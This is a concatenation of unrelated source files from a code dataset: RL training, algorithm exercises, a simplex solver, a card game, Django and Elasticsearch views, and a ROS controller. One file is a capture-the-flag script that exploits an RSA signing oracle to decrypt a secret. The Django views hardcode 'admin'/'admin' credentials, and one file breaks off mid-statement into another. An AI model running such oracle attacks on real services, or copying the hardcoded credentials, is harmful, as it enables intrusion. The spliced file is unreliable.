WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"\nExample script for training a single-node IMPALA [1] agent on an OpenAI gym environment.\nA single-node agent uses multi-threading (via tf's queue runners) to collect experiences (using\nthe \"mu\"-policy) and a learner (main) thread to update the model (the \"pi\"-policy).\n\nTODO: More examples for non-single node setup.\n\nUsage:\n\npython impala_cartpole.py [--config configs/impala_cartpole.json] [--env CartPole-v0]?\n\n[1] IMPALA: Scalable Distributed Deep-RL with Importance Weighted Actor-Learner Architectures - Espeholt, Soyer,\n Munos et al. - 2018 (https://arxiv.org/abs/1802.01561)\n\"\"\"\n\nimport json\nimport os\nimport sys\n\nfrom absl import flags\nimport numpy as np\nimport time\n\nfrom rlgraph.agents import Agent\nfrom rlgraph.environments import OpenAIGymEnv\n\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_string('config', './configs/impala_cartpole.json', 'Agent config file.')\nflags.DEFINE_string('env', None, 'openAI gym environment ID.')\nflags.DEFINE_bool('visualize', False, 'Show worker episodes.')\n\n\ndef main(argv):\n try:\n FLAGS(argv)\n except flags.Error as e:\n print('%s\\\\nUsage: %s ARGS\\\\n%s' % (e, sys.argv[0], FLAGS))\n\n agent_config_path = os.path.join(os.getcwd(), FLAGS.config)\n with open(agent_config_path, 'rt') as fp:\n agent_config = json.load(fp)\n\n if FLAGS.env is None:\n env_spec = agent_config[\"environment_spec\"]\n else:\n env_spec = dict(gym_env=FLAGS.env)\n if FLAGS.visualize is not None:\n env_spec[\"visualize\"] = FLAGS.visualize\n dummy_env = OpenAIGymEnv.from_spec(env_spec)\n agent = Agent.from_spec(\n agent_config,\n state_space=dummy_env.state_space,\n action_space=dummy_env.action_space\n )\n dummy_env.terminate()\n\n learn_updates = 100\n mean_returns = []\n for i in range(learn_updates):\n ret = agent.update()\n mean_return = _calc_mean_return(ret)\n mean_returns.append(mean_return)\n print(\"Iteration={} Loss={:.4f} Avg-reward={:.2f}\".format(i, float(ret[1]), mean_return))\n\n print(\"Mean return: {:.2f} / over the last 10 episodes: {:.2f}\".format(\n np.nanmean(mean_returns), np.nanmean(mean_returns[-10:])\n ))\n\n time.sleep(1)\n agent.terminate()\n time.sleep(1)\n\n\ndef _calc_mean_return(records):\n size = records[3][\"rewards\"].size\n rewards = records[3][\"rewards\"].reshape((size,))\n terminals = records[3][\"terminals\"].reshape((size,))\n returns = list()\n return_ = 0.0\n for r, t in zip(rewards, terminals):\n return_ += r\n if t:\n returns.append(return_)\n return_ = 0.0\n\n return np.nanmean(returns)\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"examples/impala_cartpole.py","file_name":"impala_cartpole.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"433618621","text":"# 회의실 배정 문제\ndef solve(n,data):\n data = sorted(data, key = lambda x: (x[1],x[0]))\n count = 1\n end = data[0][1]\n for i in data[1:]:\n if i[0] >= end:\n count += 1\n end = i[1]\n return count\nn = int(input())\ndata = [list(map(int,input().split())) for _ in range(n)]\nprint(solve(n,data))","sub_path":"sujang/boj/python/1931.py","file_name":"1931.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"462593186","text":"#!/usr/bin/python\n\n\n###The command at the top means that this python function can###\n###be run directly from the comman line###\n###You will also need to do chmod -u linearAdvect in unix or linux\n\nfrom __future__ import absolute_import , division , print_function\n\n###The sys module provides access to operating system commands and###\n##access to command line variables ###\nimport sys\n\n#read in all the linear advection schemes, initial conditions and a\n#code associared with this application\n\nfrom grid import *\nfrom initialConditions import *\nfrom advectionSchemes import *\nfrom diagnostics import *\nimport matplotlib.pyplot as plt\n\n\n###The main code is inside a function to avoid global variables\n###The arguments (argv) give access to the command line arguments\n\ndef main( argv ):\n ### Test the command lne argument and from these set the ###\n ###name of the input file\n if len( sys.argv ) !=2 :\n print( 'usage: linearAdvect\\n\\n'\n\n\ndef script(form):\n function = form['function']\n extremum = form['extremum']\n lefts = []\n signs = []\n rights = []\n N = (len(list(form.keys())) - 7) // 3\n for i in range(N):\n lefts.append(form['left' + str(i + 1)])\n signs.append(form['sign' + str(i + 1)])\n rights.append(form['right' + str(i + 1)])\n\n if form['type'] == 'LP':\n model = LPModel(function, extremum)\n if form['type'] == 'PP':\n model = LPModel(function, extremum)\n model.type = 'PP'\n if form['type'] == 'QP':\n model = QPModel(function, extremum)\n if form['type'] == 'SP':\n model = SPModel(function, extremum)\n\n for i in range(N):\n model.add_condition(lefts[i], signs[i], rights[i])\n\n if form['type'] == 'SP':\n return SPscript(model, form['a'], form['b'], form['count'])\n if form['type'] == 'LP':\n return LPscript(model)\n if form['type'] == 'QP':\n return QPscript(model)\n if form['type'] == 'PP':\n return PPscript(model, form['t0'])\n\n\ndef LPscript(model):\n tex = TeX()\n tex.add(model.latex())\n tex.add('Приведем задачу к каноническому виду')\n model.canonical('x')\n tex.add(model.latex())\n\n st = SimplexTable(model)\n symbols, coeff = st.solve()\n for i in range(len(st.tex.st)):\n tex.add(st.tex.st[i])\n v, latex = model.evalf(symbols, coeff)\n tex.add(latex)\n return tex.tex\n\n\ndef PPscript(model, t0):\n tex = TeX()\n tex.add(model.latex())\n tex.add('Приведем задачу к каноническому виду')\n model.canonical('x')\n tex.add(model.latex())\n st = SimplexTablePP(model, t0)\n st.solve()\n for i in range(len(st.tex.st)):\n tex.add(st.tex.st[i])\n return tex.tex\n\n\ndef QPscript(model):\n tex = TeX()\n tex.add(model.latex())\n model.get_L()\n tex.add(model.L.latex_L())\n tex.add(model.L.latex_diff())\n model.changing_conditions()\n tex.add(model.latex())\n matrix = model.to_basis()\n model.additional_conditions()\n tex.add(model.latex())\n \n tex.add('I способ.')\n tex.add('')\n st = SimplexTableQP(model)\n tex.add(st.latex())\n s, v = st.solve()\n for i in range(len(st.tex.st)):\n tex.add(st.tex.st[i])\n fs, latex = model.evalf(s, v)\n\n tex.add(latex)\n tex.add('II способ.')\n tex.add('')\n s, v, h = model.solve()\n tex.add(h)\n symbols, coeff = st.solve()\n v, latex = model.evalf(s, v)\n tex.add(latex)\n return tex.tex\n\n\ndef SPscript(model, a, b, count):\n tex = TeX()\n tex.add(model.latex())\n model.linearization(a=sp.Rational(a), b=sp.Rational(b), count=int(count))\n tex.add(model.latex_separated_functions())\n tex.add(model.latex_table())\n tex.add(model.latex_new_f())\n tex.add(model.latex_new_x())\n tex.add(\n 'Используя полученные представления, выполним переход от исходной к следующей приближенной задаче'\n )\n tex.add(model.latex())\n tex.add(\n 'Для решения полученной приближенной задачи симплекс-методом представим ее в канонической форме.'\n )\n model.canonical('x')\n tex.add(model.latex())\n st = SimplexTable(model)\n symbols, coeff = st.solve()\n for i in range(len(st.tex.st)):\n tex.add(st.tex.st[i])\n v, latex = model.evalf(symbols, coeff)\n tex.add(latex)\n return tex.tex","sub_path":"MathematicalProgramming/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"170874065","text":"import random\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Dict\nfrom enum import Enum\n\n\nclass Card(Enum):\n RED = \"RED\"\n BLACK = \"BLACK\"\n\n\nclass Action(Enum):\n PASS = \"PASS\"\n CHANGE = \"CHANGE\"\n\n\nclass Player(object):\n __metaclass__ = ABCMeta\n\n @property\n @abstractmethod\n def name(self) -> str:\n raise NotImplementedError()\n\n @abstractmethod\n def take_card(self, card: Card) -> None:\n raise NotImplementedError()\n\n @abstractmethod\n def say_card(self) -> Card:\n raise NotImplementedError()\n\n @abstractmethod\n def opponent_said_card(self, card: Card) -> None:\n raise NotImplementedError()\n\n @abstractmethod\n def would_change_card(self) -> bool:\n raise NotImplementedError()\n\n @abstractmethod\n def opponent_change_card(self, is_changed: bool) -> None:\n raise NotImplementedError()\n\n @abstractmethod\n def end_round(self) -> None:\n raise NotImplementedError()\n\n @abstractmethod\n def opponent_card(self, card) -> None:\n raise NotImplementedError()\n\n @abstractmethod\n def win(self, value) -> None:\n raise NotImplementedError()\n\n\nclass GameRound(object):\n CARDS = [Card.RED, Card.RED, Card.BLACK, Card.BLACK]\n\n def info(self, message):\n if self.debug:\n print(message)\n else:\n pass\n\n def __init__(self, player1: Player, money1: int, player2: Player, money2: int, debug: bool = False):\n assert money1 >= 10, money1\n assert money2 >= 10, money2\n self.player1 = player1\n self.player2 = player2\n self.starting_money = {player1: money1, player2: money2}\n self.current_money = {player1: money1, player2: money2}\n self.bank: int = 0\n self.debug = debug\n\n card1, card2 = random.sample(self.CARDS, 2)\n self.cards: Dict[Player, Card] = {self.player1: card1, self.player2: card2}\n self.player1.take_card(card1)\n self.info(\"%s got card %s\" % (self.player1.name, card1.name))\n self.player2.take_card(card2)\n self.info(\"%s got card %s\" % (self.player2.name, card2.name))\n\n self.bank += 20\n self.current_money[self.player1] -= 10\n self.current_money[self.player2] -= 10\n # noinspection PyDictCreation\n self.bids: Dict[Player, Card] = {}\n\n self.bids[self.player1] = self.player1.say_card()\n self.player2.opponent_said_card(self.bids[self.player1])\n self.bids[self.player2] = self.player2.say_card()\n self.player1.opponent_said_card(self.bids[self.player2])\n\n self.info(\"%s made first bid %s. Its money: %s. Bank: %s\" % (self.player1.name, self.bids[player1].name,\n self.current_money[player1],\n self.bank))\n self.info(\"%s made first bid %s. Its money: %s. Bank: %s\" % (self.player2.name, self.bids[player2].name,\n self.current_money[player2],\n self.bank))\n\n def play(self) -> (int, int):\n value1, value2 = self._run_game(self.player1, self.player2)\n\n self.player1.win(value1)\n self.player2.win(value2)\n\n self.player1.end_round()\n self.player2.end_round()\n\n return value1, value2\n\n def _run_game(self, player1: Player, player2: Player):\n action = self._make_action(player1, player2)\n\n if action == Action.PASS:\n self._make_action(player2, player1)\n\n player1.opponent_card(self.cards[player2])\n player2.opponent_card(self.cards[player1])\n\n return self._resolve()\n else:\n return self._run_game(player2, player1)\n\n def _make_action(self, player: Player, opponent: Player) -> Action:\n if self.current_money[player] < 10:\n player_action = Action.PASS\n else:\n player_action = Action.CHANGE if player.would_change_card() else Action.PASS\n opponent.opponent_change_card(player_action == Action.CHANGE)\n if player_action == Action.CHANGE:\n self.current_money[player] -= 10\n self.bank += 10\n self.bids[player] = Card.RED if self.bids[player] == Card.BLACK else Card.BLACK\n\n if player_action != Action.PASS:\n self.info(\"%s made action %s. Its bid now %s. Its money: %s. Bank: %s\" % (player.name,\n player_action.name,\n self.bids[player].name,\n self.current_money[player],\n self.bank))\n return player_action\n\n def _resolve(self) -> (int, int):\n p1_correct = self.bids[self.player1] == self.cards[self.player2]\n p2_correct = self.bids[self.player2] == self.cards[self.player1]\n self.info(\"%s had %s and %s had %s\" % (self.player1.name, self.cards[self.player1].name,\n self.player2.name, self.cards[self.player2].name))\n if p1_correct and p2_correct:\n value = self.bank / 2\n p1_value = self.current_money[self.player1] + value - self.starting_money[self.player1]\n p2_value = self.current_money[self.player2] + value - self.starting_money[self.player2]\n assert p1_value + p2_value == 0.0, (p1_value, p2_value)\n self.info(\"Both player guessed right\")\n elif p1_correct and not p2_correct:\n self.info(\"%s guessed right and %s guessed wrong\" % (self.player1.name, self.player2.name))\n p1_value = self.current_money[self.player1] + self.bank - self.starting_money[self.player1]\n p2_value = self.current_money[self.player2] - self.starting_money[self.player2]\n elif not p1_correct and p2_correct:\n self.info(\"%s guessed right and %s guessed wrong\" % (self.player2.name, self.player1.name))\n p1_value = self.current_money[self.player1] - self.starting_money[self.player1]\n p2_value = self.current_money[self.player2] + self.bank - self.starting_money[self.player2]\n else:\n self.info(\"Both player guessed wrong\")\n p1_value, p2_value = 0.0, 0.0\n assert p1_value + p2_value == 0.0, (p1_value, p2_value)\n return p1_value, p2_value\n\n\nclass Game(object):\n def __init__(self, player1: Player, money1: int, player2: Player, money2: int, rounds: int, debug: bool = False):\n self.player1 = player1\n self.player2 = player2\n self.current_money = {player1: money1, player2: money2}\n self.rounds = rounds\n self.debug = debug\n\n def info(self, message):\n if self.debug:\n print(message)\n else:\n pass\n\n def run(self) -> Player:\n self.info(\"-------------\\nGame start\\n-------------\\n\")\n for i in range(self.rounds):\n self.info(\"Round %s\\n\" % i)\n if i % 2 == 0:\n first_player, second_player = self.player1, self.player2\n else:\n first_player, second_player = self.player2, self.player1\n self.info(\"Before round %s %s have %s and %s have %s\" % (i + 1,\n self.player1.name,\n self.current_money[self.player1],\n self.player2.name,\n self.current_money[self.player2]))\n gameround = GameRound(first_player, self.current_money[first_player],\n second_player, self.current_money[second_player], self.debug)\n value1, value2 = gameround.play()\n self.info(\"%s won %s and %s won %s\" % (first_player.name, value1, second_player.name, value2))\n self.current_money[first_player] += value1\n assert self.current_money[first_player] >= 0\n self.current_money[second_player] += value2\n assert self.current_money[second_player] >= 0\n self.info(\"After %s rounds %s got %s and %s got %s\\n\" % (i + 1,\n self.player1.name,\n self.current_money[self.player1],\n self.player2.name,\n self.current_money[self.player2]))\n if self.current_money[self.player1] < 10:\n self.info(\"Game result:\\n\")\n self.info(\"After %s rounds player %s run out of money AND TOTALLY LOST\\n\" % (i + 1, self.player1.name))\n return self.player2\n if self.current_money[self.player2] < 10:\n self.info(\"Game result:\\n\")\n self.info(\"After %s rounds player %s run out of money AND TOTALLY LOST\\n\" % (i + 1, self.player2.name))\n return self.player1\n","sub_path":"casino.py","file_name":"casino.py","file_ext":"py","file_size_in_byte":9446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"31691981","text":"import re\n\nfrom invoke import task\n\nfrom optimade import __version__\n\n\n@task\ndef setver(_, patch=False, new_ver=\"\"):\n if (not patch and not new_ver) or (patch and new_ver):\n raise Exception(\n \"Either use --patch or specify e.g. --new-ver='Major.Minor.Patch(a|b|rc)?[0-9]+'\"\n )\n if patch:\n v = [int(x) for x in __version__.split(\".\")]\n v[2] += 1\n new_ver = \".\".join(map(str, v))\n with open(\"optimade/__init__.py\", \"r\") as f:\n lines = [\n re.sub(\"__version__ = .+\", '__version__ = \"{}\"'.format(new_ver), l.rstrip())\n for l in f\n ]\n with open(\"optimade/__init__.py\", \"w\") as f:\n f.write(\"\\n\".join(lines))\n f.write(\"\\n\")\n\n with open(\"setup.py\", \"r\") as f:\n lines = [\n re.sub(\"version=([^,]+),\", 'version=\"{}\",'.format(new_ver), l.rstrip())\n for l in f\n ]\n with open(\"setup.py\", \"w\") as f:\n f.write(\"\\n\".join(lines))\n f.write(\"\\n\")\n\n print(\"Bumped version to {}\".format(new_ver))\n\n\n@task\ndef update_openapijson(c):\n # pylint: disable=import-outside-toplevel\n from optimade.server.main import app, update_schema\n from optimade.server.main_index import (\n app as app_index,\n update_schema as update_schema_index,\n )\n\n update_schema(app)\n update_schema_index(app_index)\n\n c.run(\"cp openapi/local_openapi.json openapi/openapi.json\")\n c.run(\"cp openapi/local_index_openapi.json openapi/index_openapi.json\")\n\n\n@task\ndef set_optimade_ver(_, ver=\"\"):\n if not ver:\n raise Exception(\"Please specify --ver='Major.Minor.Patch'\")\n with open(\"optimade/__init__.py\", \"r\") as f:\n lines = [\n re.sub(\n \"__api_version__ = .+\", '__api_version__ = \"{}\"'.format(ver), l.rstrip()\n )\n for l in f\n ]\n with open(\"optimade/__init__.py\", \"w\") as f:\n f.write(\"\\n\".join(lines))\n f.write(\"\\n\")\n\n with open(\".ci/optimade-version.json\", \"r\") as f:\n lines = [\n re.sub('\"message\": .+', '\"message\": \"v{}\",'.format(ver), l.rstrip())\n for l in f\n ]\n with open(\".ci/optimade-version.json\", \"w\") as f:\n f.write(\"\\n\".join(lines))\n f.write(\"\\n\")\n\n print(\"Bumped OPTiMaDe version to {}\".format(ver))\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"443213029","text":"import logging\nfrom datetime import datetime\n\nfrom django.core.paginator import Paginator\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .serializers import *\nfrom elasticsearch import Elasticsearch\nfrom .models import *\n\nes = Elasticsearch([{'host': '131.163.160.58', 'port': 9200}], http_auth=('admin', 'admin'))\nindex = \"discussion_cafe\"\ntype = \"Discussion\"\n\n\nclass GeneralDiscussionQuestion(APIView):\n try:\n def get(self, request, format=None):\n response = []\n for questions in es.search(index=index, body={\"query\":{\"match\":{\"Category\":\"General\"}}})[\"hits\"][\"hits\"]:\n data = {}\n data[\"Question\"] = questions[\"_source\"][\"Question\"]\n data[\"Answers\"] = questions[\"_source\"][\"Answers\"]\n data[\"pkid\"] = questions[\"_source\"][\"pkid\"]\n response.append(data)\n\n return Response(response)\n\n def post(self, request, *args, **kwargs):\n data = request.data\n data[\"Subject\"] = \"NULL\"\n data[\"Timestamp\"] = datetime.now()\n file_serializer = DiscussionForum_QuestionsSerializer(data=data)\n if file_serializer.is_valid():\n file_serializer.save()\n data[\"Answers\"] = []\n data[\"Category\"] = \"General\"\n data[\"pkid\"] = file_serializer.data[\"id\"]\n print(data)\n elasticdata = es.index(index=index, doc_type=type, body=data)\n return Response(data, status=status.HTTP_201_CREATED)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n logging.basicConfig(filename='GOImplement\\LogFile.txt', level=logging.DEBUG)\n logging.error(str(e))\n\n\nclass GeneralDiscussionAnswer(APIView):\n try:\n def post(self, request, *args, **kwargs):\n file_serializer = DiscussionForum_AnswersSerializer(data=request.data)\n if file_serializer.is_valid():\n file_serializer.save()\n questionid = \\\n es.search(index=index, body={\"query\": {\"match\": {\"pkid\": request.data[\"fkQuestion\"]}}})[\"hits\"][\"hits\"][\n 0][\"_id\"]\n ans = request.data[\"Answer\"]\n add_answer = {\n \"script\": {\"source\": \"ctx._source.Answers.add(params.new_ans)\", \"params\": {\"new_ans\": ans}}}\n elasticdata = es.update(index=index, doc_type=type, id=questionid, body=add_answer)\n return Response(elasticdata, status=status.HTTP_201_CREATED)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n except Exception as e:\n logging.basicConfig(filename='GOImplement\\LogFile.txt', level=logging.DEBUG)\n logging.error(str(e))\n\n\nclass GetQuestionDetail(APIView):\n def get(self, request, pk, format=None):\n data = {}\n data[\"question\"] = \\\n es.search(index=index, body={\"query\": {\"match\": {\"pkid\": pk}}})[\"hits\"][\"hits\"][0][\"_source\"][\"Question\"]\n data[\"answer\"] = es.search(index=index, body={\"query\": {\"match\": {\"pkid\": pk}}})[\"hits\"][\"hits\"][0][\"_source\"][\n \"Answers\"]\n return Response(data)\n\n\nclass GetHighlightedResults(APIView):\n def get(self, request, format=None):\n # text = request.data[\"Text\"]\n text = request.GET.get('text')\n response = []\n if text == \"\" :\n for questions in es.search(index=index, body={\"size\": 10000, \"query\": {\"match_all\": {}}})[\"hits\"][\"hits\"]:\n data = {}\n data[\"Question\"] = questions[\"_source\"][\"Question\"]\n data[\"Answers\"] = questions[\"_source\"][\"Answers\"]\n data[\"pkid\"] = questions[\"_source\"][\"pkid\"]\n data[\"Timestamp\"] = questions[\"_source\"][\"Timestamp\"]\n data[\"Category\"] = questions[\"_source\"][\"Category\"]\n response.append(data)\n\n return Response(response)\n\n else:\n\n for question in es.search(index=index, doc_type=type, body={\"query\": {\"bool\": {\n \"must\": [{\"match_phrase_prefix\": {\"Question\": {\"query\": text, \"analyzer\": \"my_synonyms\"}}},\n ]}}, \"highlight\": {\"pre_tags\": [\"\"],\n \"post_tags\": [\"\"],\n \"fields\": {\"Question\": {}}}})[\"hits\"][\"hits\"]:\n data = {}\n data[\"Question\"] = question[\"_source\"][\"Question\"]\n data[\"Pkid\"] = question[\"_source\"][\"pkid\"]\n data[\"Highlights\"] = question[\"highlight\"][\"Question\"]\n data[\"Category\"] = question[\"_source\"][\"Category\"]\n data[\"Answers\"] = question[\"_source\"][\"Answers\"]\n response.append(data)\n\n return Response(response)\n\n\nclass TefDiscussion(APIView):\n\n def get(self, request, format=None):\n response = []\n for questions in es.search(index=index, body={\"size\": 10000, \"query\": {\"match\": {\"Category\": \"TEF\"}}})[\"hits\"][\n \"hits\"]:\n data = {}\n data[\"Question\"] = questions[\"_source\"][\"Question\"]\n data[\"Answers\"] = questions[\"_source\"][\"Answers\"]\n data[\"pkid\"] = questions[\"_source\"][\"pkid\"]\n data[\"AskedBy\"] = questions[\"_source\"][\"Sender\"]\n response.append(data)\n return Response(response)\n\nclass TefDiscussion(APIView):\n\n def get(self, request, pk, format=None):\n response = []\n response_count = {}\n # page_num = request.data['page']\n filter = request.GET.get('time')\n page_num = pk\n questions = es.search(index=index, body={\"size\": 10000, \"query\": {\"match\": {\"Category\": \"TEF\"}}})[\"hits\"][\"hits\"]\n count = es.search(index=index, body={\"size\": 10000, \"query\": {\"match\": {\"Category\": \"TEF\"}}})[\"hits\"][\"total\"]\n if filter == '24 Hours':\n time = datetime.datetime.now()- datetime.timedelta(days=1)\n print(time)\n questions = es.search(index=index, body={\"size\": 10000, \"query\":\n {\"bool\":{\n \"must\":[\n {\"match\":\n {\"Category\": \"TEF\"}\n },\n {\n \"range\":{\n \"Timestamp\":{\n \"gte\":time,\n \"lte\":datetime.datetime.now()\n }\n }\n }\n ]}}}\n )[\"hits\"][\"hits\"]\n count = es.search(index=index, body={\"size\": 10000, \"query\":\n {\"bool\":{\n \"must\":[\n {\"match\":\n {\"Category\": \"TEF\"}\n },\n {\n \"range\":{\n \"Timestamp\":{\n \"gte\":time,\n \"lte\":datetime.datetime.now()\n }\n }\n }\n ]}}}\n )[\"hits\"][\"total\"]\n elif filter == 'past week':\n time = datetime.datetime.now()- datetime.timedelta(days=7)\n print(time)\n questions = es.search(index=index, body={\"size\": 10000, \"query\":\n {\"bool\":{\n \"must\":[\n {\"match\":\n {\"Category\": \"TEF\"}\n },\n {\n \"range\":{\n \"Timestamp\":{\n \"gte\":time,\n \"lte\":datetime.datetime.now()\n }\n }\n }\n ]}}}\n )[\"hits\"][\"hits\"]\n count = es.search(index=index, body={\"size\": 10000, \"query\":\n {\"bool\": {\n \"must\": [\n {\"match\":\n {\"Category\": \"TEF\"}\n },\n {\n \"range\": {\n \"Timestamp\": {\n \"gte\": time,\n \"lte\": datetime.datetime.now()\n }\n }\n }\n ]}}}\n )[\"hits\"][\"total\"]\n elif filter == 'past month':\n time = datetime.datetime.now()- datetime.timedelta(days=30)\n print(time)\n questions = es.search(index=index, body={\"size\": 10000, \"query\":\n {\"bool\":{\n \"must\":[\n {\"match\":\n {\"Category\": \"TEF\"}\n },\n {\n \"range\":{\n \"Timestamp\":{\n \"gte\":time,\n \"lte\":datetime.datetime.now()\n }\n }\n }\n ]}}}\n )[\"hits\"][\"hits\"]\n count = es.search(index=index, body={\"size\": 10000, \"query\":\n {\"bool\": {\n \"must\": [\n {\"match\":\n {\"Category\": \"TEF\"}\n },\n {\n \"range\": {\n \"Timestamp\": {\n \"gte\": time,\n \"lte\": datetime.datetime.now()\n }\n }\n }\n ]}}}\n )[\"hits\"][\"total\"]\n if page_num <= (count / 10) + 1:\n paginator = Paginator(questions, 10)\n page = paginator.page(page_num)\n response_count[\"Count\"] = count\n for i in page.object_list:\n data = {}\n data[\"Question\"] = i[\"_source\"][\"Question\"]\n data[\"Answers\"] = i[\"_source\"][\"Answers\"]\n data[\"pkid\"] = i[\"_source\"][\"pkid\"]\n data[\"AskedBy\"] = i[\"_source\"][\"Sender\"]\n data[\"Category\"] = i[\"_source\"][\"Category\"]\n response.append(data)\n response_count[\"Response\"]=response\n return Response(response_count)\n return Response([])\n\n\n","sub_path":"obj/Release/Package/PackageTmp/GOImplement/GeneralDiscussion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"309165227","text":"from pwn import * # pip install pwntools\nimport json\nfrom Crypto.Util.number import long_to_bytes\n\nr = remote('socket.cryptohack.org', 13374, level = 'debug')\n\ndef json_recv():\n line = r.recvline()\n return json.loads(line.decode())\n\ndef json_send(hsh):\n request = json.dumps(hsh).encode()\n r.sendline(request)\n \nto_send = {\n \"option\": \"\"\n}\n\nto_send['option']='get_pubkey'\njson_send(to_send)\nr.recvline()\nresult = json_recv()\nN = eval(result[\"N\"])\ne = eval(result['e'])\n\nto_send['option']='get_secret'\njson_send(to_send)\nresult = json_recv()\nsecret = result['secret']\n\nto_send['option']='sign'\nto_send['msg']=secret\njson_send(to_send)\nresult = json_recv()\n\nresult = eval(result['signature'])\nprint(long_to_bytes(result))\n","sub_path":"CryptoHack/RSA_Signing_Server.py","file_name":"RSA_Signing_Server.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"462674836","text":"n = int(input())\nn_arr = list(map(int, input().split()))\nm = int(input())\nm_arr = list(map(int, input().split()))\n\ndef search(target, list, start, end):\n while start <=end:\n mid = (start + end) //2\n if list[mid] == target:\n return mid\n elif list[mid] < target:\n start = mid +1\n else:\n end = mid - 1\n return None\n\nn_arr.sort()\nfor m in m_arr:\n result = search(m, n_arr, 0, len(n_arr)-1)\n if result != None:\n print('yes', end=' ')\n else:\n print('no', end=' ')\n\n#이진탐색말고도 다른 해결방법들 존재. ","sub_path":"coding_test/2_7/7_2.py","file_name":"7_2.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"64336106","text":"'''\nGiven a collection of intervals, merge all overlapping intervals\n'''\nclass Solution:\n def merge(self, intervals):\n if not intervals:\n return []\n if len(intervals) < 2:\n return intervals\n intervals.sort(key=lambda i:i[0])\n i = 1\n temp = intervals[0]\n while i < len(intervals):\n if temp[1] >= intervals[i][0]:\n temp[1] = max(temp[1], intervals[i][1])\n intervals[i-1] = temp\n intervals.pop(i)\n else:\n temp = intervals[i]\n i += 1\n #print(intervals)\n return intervals\n\nnums1 = [[1,3],[2,6],[8,10],[15,18]]\nfunction = Solution()\nfunction.merge(nums1)","sub_path":"Array/problem56/merge_interval.py","file_name":"merge_interval.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"175523908","text":"#!/usr/bin/env python\nimport rospy\nfrom sensor_msgs.msg import LaserScan\nfrom std_msgs.msg import String, Header\nfrom lab4.msg import cone_data_msgs as ConeData\nfrom ackermann_msgs.msg import AckermannDriveStamped, AckermannDrive\n\nimport numpy as np\n\n\"\"\"\nDescription: This program implements a controller whcih will drive to an object and maintain a certain distance from is based on image data.\n\nThis is the ROS structure of the ConeData message:\n\nfloat32 horizontal_error\nint32 height\n\"\"\"\n\ndef getDistance(height):\n distance = -0.00001 * (height**3) + 0.003 * (height**2) - 0.3198 * height + 13.222\n distance_m = distance / 3.28084 # convert to meters\n return distance_m\n\n\nclass IBVSControl():\n def __init__(self):\n # Init subscribers and publishers\n self.sub = rospy.Subscriber(\"/echo_node/cone_data\", ConeData, self.dataCB, queue_size=1)\n\n self.pub = rospy.Publisher(\"/vesc/high_level/ackermann_cmd_mux/input/nav_0\",\\\n AckermannDriveStamped, queue_size =1 )\n\n rospy.loginfo(\"IBVS Control node initialized\")\n\n\n def dataCB(self, msg):\n #This callback is called everytime the zed object detector sends us data and is responsible\n #for sending the drive message to the car. The message received is a ConeData message.\n # Define useful constants \n h_error = msg.horizontal_error\n height = msg.height\n threshold = .45\n speed = 1.0\n angle_gain = .7\n speed_gain = .9\t\t\n\n # Calaculate steering angle \n steering_angle = angle_gain*h_error\n\n # Calculate the drive speed\n distance = getDistance(height)\n distance_error = distance - threshold\n\n if (distance_error > 2):\n distance_error = 2\n elif (distance_error < -2):\n distance_error = -2\n\n drive_speed = speed_gain * distance_error\n\n # Send the drive message\n drive_msg_stamped = AckermannDriveStamped()\n drive_msg = AckermannDrive()\n drive_msg.speed = drive_speed\n drive_msg.steering_angle = steering_angle\n drive_msg_stamped.drive = drive_msg\n self.pub.publish(drive_msg_stamped)\n\n\nif __name__==\"__main__\":\n # Tell ROS that we're making a new node.\n rospy.init_node(\"IBVSControl\")\n\n # Init the node\n IBVSControl()\n\n # Don't let this script exit while ROS is still running\n rospy.spin()\n\n","sub_path":"ibvs_control.py","file_name":"ibvs_control.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"154992570","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 10 12:07:33 2018\n\n@author: franchesoni\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\n# CARGA DE IMAGENES Y TEMPLATES\nplt.close('all')\nimages = []\nfor i in range(3, 12):\n images.append(cv2.bitwise_not(cv2.imread('../../../images/regiones_UTE/binary{}.jpg'.format(i))[:, :, 0]))\ntemplates = []\nfor i in range(1, 4):\n templates.append(cv2.bitwise_not((cv2.imread('../../../images/Extras/template{}.jpg'.format(i)))[55:260, 40:310, 0]))\n#%%\n# SELECCION DE UNA IMAGEN Y SU TRANSFORMADA\nimg = images[0]\nimg_fft = np.fft.fft2(img)\n#%%\nmaxima = [] # LISTA VACIA DONDE VAN LOS MAXIMOS A COMPARAR\n\nar = templates[0].shape[0]/templates[0].shape[1] # ASPECT 